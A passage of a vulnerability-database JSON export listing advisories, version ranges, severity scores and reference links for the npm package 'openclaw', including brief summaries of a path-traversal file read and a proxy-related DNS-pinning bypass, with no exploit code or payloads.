8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41408","GHSA-4g5x-2jfc-xm98"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2wr9-h42m-a7ev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89250?format=json","vulnerability_id":"VCID-32zs-2zs9-uufs","summary":"OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read\n## Summary\nOpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"},{"reference_url":"https://github.com/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"GHSA-f6pf-4gjx-c94r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f6pf-4gjx-c94r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-f6pf-4gjx-c94r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-32zs-2zs9-uufs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50574?format=json","vulnerability_id":"VCID-34hg-6fw2-wfax","summary":"OpenClaw's web tools strict URL guard could lose DNS pinning when env proxy is configured\n`openclaw` web tools strict URL fetch paths could lose DNS pinning when environment proxy variables are configured (`HTTP_PROXY`/`HTTPS_PROXY`/`ALL_PROXY`, including lowercase variants).\n\nIn affected builds, strict URL checks (for example `web_fetch` and citation redirect resolution) validated one destination during SSRF guard checks, but runtime connection routing could proceed through an env-proxy dispatcher.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22181","reference_id":"","reference_type":"","scores":[{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20644","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20687","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20703","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22181"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/345abf0b2e0f43b0f229e96f252ebf56f1e5549e","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://github.com/openclaw/openclaw/commit/345abf0b2e0f43b0f229e96f252ebf56f1e5549e"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dns-pinning-bypass-via-environment-proxy-configuration-in-web-fetch","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-dns-pinning-bypass-via-environment-proxy-configuration-in-web-fetch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22181","reference_id":"CVE-2026-22181","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22181"},{"reference_url":"https://github.com/advisories/GHSA-8mvx-p2r9-r375","reference_id":"GHSA-8mvx-p2r9-r375","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8mvx-p2r9-r375"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8mvx-p2r9-r375","reference_id":"GHSA-8mvx-p2r9-r375","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8mvx-p2r9-r375"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vul